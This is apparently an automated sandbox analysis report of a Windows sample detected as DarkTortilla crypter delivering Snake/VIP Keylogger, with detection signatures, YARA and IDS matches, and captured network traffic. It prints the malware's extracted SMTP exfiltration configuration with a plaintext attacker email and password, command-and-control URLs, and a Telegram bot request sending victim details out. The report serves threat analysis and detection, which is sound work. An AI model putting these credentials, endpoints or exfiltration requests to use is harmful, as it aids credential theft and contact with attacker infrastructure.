
Windows Analysis Report
pbCN4g6sN5.exe

Overview

General Information

Sample name:pbCN4g6sN5.exe
renamed because original name is a hash value
Original sample name:0d6d13b615ce21e4a4ff75ec6ad0047a5664aafc05745188afc2e4497c2bed9f.exe
Analysis ID:1586029
MD5:7d88e5bad194e89ada135543169da996
SHA1:929a742475ae4b93a5e164b1d565d7d7f78f6b62
SHA256:0d6d13b615ce21e4a4ff75ec6ad0047a5664aafc05745188afc2e4497c2bed9f
Tags:exeuser-adrian__luca

Detection

DarkTortilla, Snake Keylogger, VIP Keylogger
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected DarkTortilla Crypter
Yara detected Snake Keylogger
Yara detected Telegram RAT
Yara detected VIP Keylogger
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code references suspicious native API functions
AI detected suspicious sample
Allocates memory in foreign processes
Contains functionality to capture screen (.Net source)
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Contains functionality to log keystrokes (.Net Source)
Hides that the sample has been downloaded from the Internet (zone.identifier)
Injects a PE file into a foreign processes
Machine Learning detection for sample
Tries to delay execution (extensive OutputDebugStringW loop)
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses the Telegram API (likely for C&C communication)
Writes to foreign memory regions
Yara detected Generic Downloader
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if the current process is being debugged
Contains functionality to launch a process as a different user
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • pbCN4g6sN5.exe (PID: 5696 cmdline: "C:\Users\user\Desktop\pbCN4g6sN5.exe" MD5: 7D88E5BAD194E89ADA135543169DA996)
    • InstallUtil.exe (PID: 7492 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe" MD5: 5D4073B2EB6D217C19F2B22F21BF8D57)
  • cleanup
Name: DarkTortilla
Description: DarkTortilla is a complex and highly configurable .NET-based crypter that has possibly been active since at least August 2015. It typically delivers popular information stealers and remote access trojans (RATs) such as AgentTesla, AsyncRat, NanoCore, and RedLine. While it appears to primarily deliver commodity malware, Secureworks Counter Threat Unit (CTU) researchers identified DarkTortilla samples delivering targeted payloads such as Cobalt Strike and Metasploit. It can also deliver "addon packages" such as additional malicious payloads, benign decoy documents, and executables. It features robust anti-analysis and anti-tamper controls that can make detection, analysis, and eradication challenging. From January 2021 through May 2022, an average of 93 unique DarkTortilla samples per week were uploaded to the VirusTotal analysis service. Code similarities suggest possible links between DarkTortilla and other malware: a crypter operated by the RATs Crew threat group, which was active between 2008 and 2012, and the Gameloader malware that emerged in 2021.
Attribution: No Attribution
Blogpost URLs: (none listed)
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.darktortilla

Name: 404 Keylogger, Snake Keylogger
Description: Snake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victim's sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.
Attribution: No Attribution
Blogpost URLs: (none listed)
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger
{"Exfil Mode": "SMTP", "Email ID": "sammys@gtpv.online", "Password": "7213575aceACE@@", "Host": "mail.gtpv.online", "Port": "587"}
{"Exfil Mode": "SMTP", "Username": "sammys@gtpv.online", "Password": "7213575aceACE@@", "Host": "mail.gtpv.online", "Port": "587", "Version": "4.4"}
Yara matches (Source / Rule / Description / Author / Strings):

Source: 00000000.00000002.2382308673.0000000003559000.00000004.00000800.00020000.00000000.sdmp
Rule: JoeSecurity_CredentialStealer
Description: Yara detected Credential Stealer
Author: Joe Security

Source: 00000000.00000002.2382308673.0000000003559000.00000004.00000800.00020000.00000000.sdmp
Rule: JoeSecurity_VIPKeylogger
Description: Yara detected VIP Keylogger
Author: Joe Security

Source: 00000000.00000002.2382308673.0000000003559000.00000004.00000800.00020000.00000000.sdmp
Rule: JoeSecurity_TelegramRAT
Description: Yara detected Telegram RAT
Author: Joe Security

Source: 00000000.00000002.2382308673.0000000003559000.00000004.00000800.00020000.00000000.sdmp
Rule: Windows_Trojan_SnakeKeylogger_af3faa65
Description: unknown
Author: unknown
Strings:
  • 0x2dff0:$a1: get_encryptedPassword
  • 0x2e578:$a2: get_encryptedUsername
  • 0x2dc63:$a3: get_timePasswordChanged
  • 0x2dd7a:$a4: get_passwordField
  • 0x2e006:$a5: set_encryptedPassword
  • 0x30d22:$a6: get_passwords
  • 0x310b6:$a7: get_logins
  • 0x30d0e:$a8: GetOutlookPasswords
  • 0x306c7:$a9: StartKeylogger
  • 0x3100f:$a10: KeyLoggerEventArgs
  • 0x30767:$a11: KeyLoggerEventArgsEventHandler

Source: 00000000.00000002.2383848177.0000000004B30000.00000004.08000000.00040000.00000000.sdmp
Rule: JoeSecurity_DarkTortilla
Description: Yara detected DarkTortilla Crypter
Author: Joe Security

(22 further memory-dump entries not shown)

Yara matches in unpacked PE files (Source / Rule / Description / Author / Strings):

Source: 0.2.pbCN4g6sN5.exe.36a2f30.0.unpack
Rule: JoeSecurity_DarkTortilla
Description: Yara detected DarkTortilla Crypter
Author: Joe Security

Source: 0.2.pbCN4g6sN5.exe.365d150.3.unpack
Rule: JoeSecurity_DarkTortilla
Description: Yara detected DarkTortilla Crypter
Author: Joe Security

Source: 0.2.pbCN4g6sN5.exe.4b30000.4.unpack
Rule: JoeSecurity_DarkTortilla
Description: Yara detected DarkTortilla Crypter
Author: Joe Security

Source: 0.2.pbCN4g6sN5.exe.36a2f30.0.raw.unpack
Rule: JoeSecurity_DarkTortilla
Description: Yara detected DarkTortilla Crypter
Author: Joe Security

Source: 0.2.pbCN4g6sN5.exe.4b30000.4.raw.unpack
Rule: JoeSecurity_DarkTortilla
Description: Yara detected DarkTortilla Crypter
Author: Joe Security

(21 further unpacked-PE entries not shown)
                    No Sigma rule has matched
Suricata IDS alerts (Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol):

2025-01-08T16:33:10.683264+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.4 | 49836 | 188.114.97.3 | 443 | TCP
2025-01-08T16:33:15.157202+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.4 | 49869 | 188.114.97.3 | 443 | TCP
2025-01-08T16:33:18.079410+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.4 | 49892 | 188.114.97.3 | 443 | TCP
2025-01-08T16:33:08.959347+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.4 | 49821 | 132.226.8.169 | 80 | TCP
2025-01-08T16:33:10.111995+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.4 | 49821 | 132.226.8.169 | 80 | TCP
2025-01-08T16:33:11.537491+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.4 | 49841 | 132.226.8.169 | 80 | TCP
2025-01-08T16:33:21.949552+0100 | 1810007 | 1 | Potentially Bad Traffic | 192.168.2.4 | 49920 | 149.154.167.220 | 443 | TCP

                    AV Detection

                    Source: pbCN4g6sN5.exeAvira: detected
                    Source: http://varders.kozow.com:8081Avira URL Cloud: Label: malware
                    Source: http://anotherarmy.dns.army:8081Avira URL Cloud: Label: phishing
                    Source: http://aborters.duckdns.org:8081Avira URL Cloud: Label: phishing
                    Source: 00000005.00000002.2903836633.0000000002DC1000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: Snake Keylogger {"Exfil Mode": "SMTP", "Username": "sammys@gtpv.online", "Password": "7213575aceACE@@", "Host": "mail.gtpv.online", "Port": "587", "Version": "4.4"}
                    Source: 0.2.pbCN4g6sN5.exe.35df6d0.2.unpackMalware Configuration Extractor: VIP Keylogger {"Exfil Mode": "SMTP", "Email ID": "sammys@gtpv.online", "Password": "7213575aceACE@@", "Host": "mail.gtpv.online", "Port": "587"}
                    Source: pbCN4g6sN5.exeReversingLabs: Detection: 71%
                    Source: Submitted SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                    Source: pbCN4g6sN5.exeJoe Sandbox ML: detected

                    Location Tracking

                    Source: unknownDNS query: name: reallyfreegeoip.org
                    Source: pbCN4g6sN5.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                    Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49827 version: TLS 1.0
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49920 version: TLS 1.2
                    Source: pbCN4g6sN5.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 02BEF8E9h5_2_02BEF630
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 02BEFD41h5_2_02BEFA88

                    Networking

                    Source: Network trafficSuricata IDS: 1810007 - Severity 1 - Joe Security ANOMALY Telegram Send Message : 192.168.2.4:49920 -> 149.154.167.220:443
                    Source: unknownDNS query: name: api.telegram.org
                    Source: Yara matchFile source: 5.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.pbCN4g6sN5.exe.35df6d0.2.raw.unpack, type: UNPACKEDPE
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:724536%0D%0ADate%20and%20Time:%2009/01/2025%20/%2000:36:30%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20724536%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                    Source: Joe Sandbox ViewIP Address: 132.226.8.169 132.226.8.169
                    Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
                    Source: Joe Sandbox ViewJA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
                    Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                    Source: unknownDNS query: name: checkip.dyndns.org
                    Source: unknownDNS query: name: reallyfreegeoip.org
                    Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49841 -> 132.226.8.169:80
                    Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49821 -> 132.226.8.169:80
                    Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49869 -> 188.114.97.3:443
                    Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49836 -> 188.114.97.3:443
                    Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49892 -> 188.114.97.3:443
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                    Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49827 version: TLS 1.0
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:724536%0D%0ADate%20and%20Time:%2009/01/2025%20/%2000:36:30%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20724536%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                    Source: global trafficDNS traffic detected: DNS query: checkip.dyndns.org
                    Source: global trafficDNS traffic detected: DNS query: reallyfreegeoip.org
                    Source: global trafficDNS traffic detected: DNS query: api.telegram.org
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Wed, 08 Jan 2025 15:33:21 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                    Source: pbCN4g6sN5.exe, 00000000.00000002.2382308673.0000000003559000.00000004.00000800.00020000.00000000.sdmp, pbCN4g6sN5.exe, 00000000.00000002.2382308673.00000000035DF000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.2900986537.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded
                    Source: pbCN4g6sN5.exe, 00000000.00000002.2382308673.0000000003559000.00000004.00000800.00020000.00000000.sdmp, pbCN4g6sN5.exe, 00000000.00000002.2382308673.00000000035DF000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.2903836633.0000000002DC1000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.2900986537.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://aborters.duckdns.org:8081
                    Source: pbCN4g6sN5.exe, 00000000.00000002.2382308673.0000000003559000.00000004.00000800.00020000.00000000.sdmp, pbCN4g6sN5.exe, 00000000.00000002.2382308673.00000000035DF000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.2903836633.0000000002DC1000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.2900986537.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://anotherarmy.dns.army:8081
                    Source: InstallUtil.exe, 00000005.00000002.2903836633.0000000002DC1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org
                    Source: InstallUtil.exe, 00000005.00000002.2903836633.0000000002DC1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/
                    Source: pbCN4g6sN5.exe, 00000000.00000002.2382308673.0000000003559000.00000004.00000800.00020000.00000000.sdmp, pbCN4g6sN5.exe, 00000000.00000002.2382308673.00000000035DF000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.2900986537.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/q
                    Source: InstallUtil.exe, 00000005.00000002.2903836633.0000000002DC1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                    Source: pbCN4g6sN5.exe, 00000000.00000002.2382308673.0000000003559000.00000004.00000800.00020000.00000000.sdmp, pbCN4g6sN5.exe, 00000000.00000002.2382308673.00000000035DF000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.2903836633.0000000002DC1000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.2900986537.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://varders.kozow.com:8081
                    Source: pbCN4g6sN5.exe, 00000000.00000002.2385906795.0000000006D32000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
                    Source: pbCN4g6sN5.exe, 00000000.00000002.2385906795.0000000006D32000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.carterandcone.coml
                    Source: pbCN4g6sN5.exe, 00000000.00000002.2385906795.0000000006D32000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com
                    Source: pbCN4g6sN5.exe, 00000000.00000002.2385906795.0000000006D32000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers
                    Source: pbCN4g6sN5.exe, 00000000.00000002.2385906795.0000000006D32000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
                    Source: pbCN4g6sN5.exe, 00000000.00000002.2385906795.0000000006D32000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
                    Source: pbCN4g6sN5.exe, 00000000.00000002.2385906795.0000000006D32000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
                    Source: pbCN4g6sN5.exe, 00000000.00000002.2385906795.0000000006D32000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
                    Source: pbCN4g6sN5.exe, 00000000.00000002.2385906795.0000000006D32000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
                    Source: pbCN4g6sN5.exe, 00000000.00000002.2385906795.0000000006D32000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
                    Source: pbCN4g6sN5.exe, 00000000.00000002.2385906795.0000000006D32000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fonts.com
                    Source: pbCN4g6sN5.exe, 00000000.00000002.2385906795.0000000006D32000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn
                    Source: pbCN4g6sN5.exe, 00000000.00000002.2385906795.0000000006D32000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
                    Source: pbCN4g6sN5.exe, 00000000.00000002.2385906795.0000000006D32000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
                    Source: pbCN4g6sN5.exe, 00000000.00000002.2385906795.0000000006D32000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
                    Source: pbCN4g6sN5.exe, 00000000.00000002.2385906795.0000000006D32000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
                    Source: pbCN4g6sN5.exe, 00000000.00000002.2385906795.0000000006D32000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.goodfont.co.kr
                    Source: pbCN4g6sN5.exe, 00000000.00000002.2385906795.0000000006D32000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
                    Source: pbCN4g6sN5.exe, 00000000.00000002.2385906795.0000000006D32000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sajatypeworks.com
                    Source: pbCN4g6sN5.exe, 00000000.00000002.2385906795.0000000006D32000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sakkal.com
                    Source: pbCN4g6sN5.exe, 00000000.00000002.2385906795.0000000006D32000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sandoll.co.kr
                    Source: pbCN4g6sN5.exe, 00000000.00000002.2385906795.0000000006D32000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.tiro.com
                    Source: pbCN4g6sN5.exe, 00000000.00000002.2385906795.0000000006D32000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.typography.netD
                    Source: pbCN4g6sN5.exe, 00000000.00000002.2385906795.0000000006D32000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.urwpp.deDPlease
                    Source: pbCN4g6sN5.exe, 00000000.00000002.2385906795.0000000006D32000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
                    Source: InstallUtil.exe, 00000005.00000002.2907422568.0000000004089000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                    Source: InstallUtil.exe, 00000005.00000002.2903836633.0000000002EA3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org
                    Source: pbCN4g6sN5.exe, 00000000.00000002.2382308673.0000000003559000.00000004.00000800.00020000.00000000.sdmp, pbCN4g6sN5.exe, 00000000.00000002.2382308673.00000000035DF000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.2900986537.0000000000402000.00000040.00000400.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.2903836633.0000000002EA3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot
                    Source: InstallUtil.exe, 00000005.00000002.2903836633.0000000002EA3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=
                    Source: InstallUtil.exe, 00000005.00000002.2903836633.0000000002EA3000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:724536%0D%0ADate%20a
                    Source: InstallUtil.exe, 00000005.00000002.2907422568.0000000004089000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                    Source: InstallUtil.exe, 00000005.00000002.2907422568.0000000004089000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                    Source: InstallUtil.exe, 00000005.00000002.2907422568.0000000004089000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                    Source: InstallUtil.exe, 00000005.00000002.2903836633.0000000002F81000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.2903836633.0000000002EC7000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.2903836633.0000000002F72000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://chrome.google.com/webstore?hl=en
                    Source: InstallUtil.exe, 00000005.00000002.2903836633.0000000002F7C000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://chrome.google.com/webstore?hl=enlBiq
                    Source: InstallUtil.exe, 00000005.00000002.2907422568.0000000004089000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/ac/?q=
                    Source: InstallUtil.exe, 00000005.00000002.2907422568.0000000004089000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/chrome_newtab
